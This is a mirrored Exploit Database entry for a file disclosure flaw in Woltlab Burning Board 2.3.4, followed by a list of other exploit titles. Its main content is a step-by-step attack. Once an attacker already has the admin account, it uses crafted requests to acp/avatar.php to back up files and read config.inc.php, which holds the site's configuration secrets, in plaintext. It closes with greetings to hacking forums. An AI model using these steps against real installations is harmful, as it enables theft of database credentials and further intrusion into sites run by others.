Woltlab Burning Board 2.3.4 – File Disclosure

Exploit Database
27 阅读

作者： sfx

日期： 2010-11-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15500/

# Exploit Title: Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
# Date: 2010-11-12
# Author: SFX
# Version: 2.3.4
# CVE : N/A

After you've used the Exploit to get the admin account:

goto: http://lolcathost/wbb/acp/avatar.php?action=readfolder

import: acp/lib

download a backup: http://lolcathost/wbb/acp/avatar.php?action=backup

goto: http://lolcathost/wbb/acp/avatar.php?action=view

search for: config.inc.php

after you know the name (for example avatar-17.php), goto the zip archive
and open avatar-17.php

that's the config.inc.php in plaintext

tested under 2.3.4, maybe other versions work too

Greetz to:
free-hack.com, back2hack.cc, hackerking, Omegavirus, BlackBerry, fred777,
Red Tiger, Samsa

last Exploits
Woltlab Burning Board 2.3.4 – File Disclosure的更多信息

Moodle 2.x/3.x – SQL Injection：
Article Management System 2.1.2 – Reinstall：
Trade Manager Script – SQL Injection：
Tutorialms 1.4 – ‘show’ SQL Injection：
Social Share – ‘vote.php’ HTTP Response Splitting：
Drupal 7.x Module Services – Remote Code Execution：
PHP Web Scripts Ad Manager Pro 3.0 – SQL Injection：
Joomla! Component JSupport 1.5.6 – SQL Injection：